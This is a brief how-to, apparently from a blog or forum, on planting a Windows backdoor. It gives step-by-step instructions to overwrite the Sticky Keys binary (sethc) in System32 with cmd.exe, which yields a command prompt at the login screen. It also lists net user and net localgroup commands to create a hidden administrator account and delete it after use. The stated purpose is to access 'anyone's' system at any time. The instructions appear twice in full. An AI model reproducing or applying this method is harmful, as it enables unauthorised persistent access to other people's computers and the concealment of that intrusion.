BACKDOOR means a hidden way to enter in any system. We make a backdoor to be able to open the system of anyone at anytime.
But we must get the target system logged in as administrator once when we have to make Backdoor.
1. Open computer
2. Windows
3. System32
4. copy cmd
5. paste on desktop
6. Rename as sethc
7. cut this renamed file
8. paste into system32
9. move and replace
Now whenever you press shift as 5 times, cmd will be open…
This function is also worked on logged on screen.
Command to make new user:
net user username /add
Command to make user as administrator:
net localgroup administrators username /add
Command to delete the user:
net user username /del
This trick helps you to access any system making new user and you can delete it after work.
But we must get the target system logged in as administrator once when we have to make Backdoor.
1. Open computer
2. Windows
3. System32
4. copy cmd
5. paste on desktop
6. Rename as sethc
7. cut this renamed file
8. paste into system32
9. move and replace
Now whenever you press shift as 5 times, cmd will be open…
This function is also worked on logged on screen.
Command to make new user:
net user username /add
Command to make user as administrator:
net localgroup administrators username /add
Command to delete the user:
net user username /del
This trick helps you to access any system making new user and you can delete it after work.